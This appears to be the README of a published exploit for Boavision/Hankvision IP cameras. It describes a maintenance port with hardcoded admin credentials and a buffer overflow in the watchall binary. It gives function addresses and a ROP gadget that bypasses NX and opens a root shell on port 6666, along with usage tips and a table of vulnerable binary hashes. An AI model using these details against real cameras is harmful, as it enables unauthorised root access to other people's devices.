Boavision aka Hankvision watchall exploit
The watchall executable is responsable to start all the main binaries of the camera. Furthermore, it open the "maintainance" (a.k.a. backdoor) port tcp/20203 which permits to obtain information from the camera, restore the factory configuration, reboot the camera or upgrade the firmware. All these operations require to login into the camera using the hardcoded credentials "admin","admin" using the same "maintenance" port.
Watchall exists in different versions (at least 3): in two of them is very easy to have a root shell using only gadgets present in the binary itself. The last one require gadgets from uClibc.
The exploit is based on a buffer overflow on TransAndUpdateHandle() (0xabec)
in the watchall binary. The buffer overflow is due to the unchecked length on
the received update package at 0xae78.
The watchall binary is compiled with NX protection, to bypass it, call
system() and open a remote shell, it is possible to use the gadget at 0xce20:
cpy r0,sp
bl system
- I deny any responsibility in problems related to the malfunctioning of this software and its use on your hardware, be careful!
- The shell opened on port tcp/6666 could crash, please use
passwdcommand to tempoarly change the root password and login through telnet port to have a stable shell. - The exploit crashes watchall daemon, so when you have finished to explore the camera please restart it through the web interface.
- Using the wrong exploit version crashes watchall without open a shell and require a camera reboot before retry with another one.
| Watchall sha1sum | Version | Notes |
|---|---|---|
| ca4a38bf7c1e49cd12c125ac3d730cfea897c2b0 | 1 | Binary from my camera |
| 4d70b63a956347a4c39fb43889de4d29005a8bab | 2 | Other version easy exploitable |
| 5959ead28bb0aa7134a3763512331871ddd704b2 | 3 | Require gadgets from uClibc (not implemented at the moment) |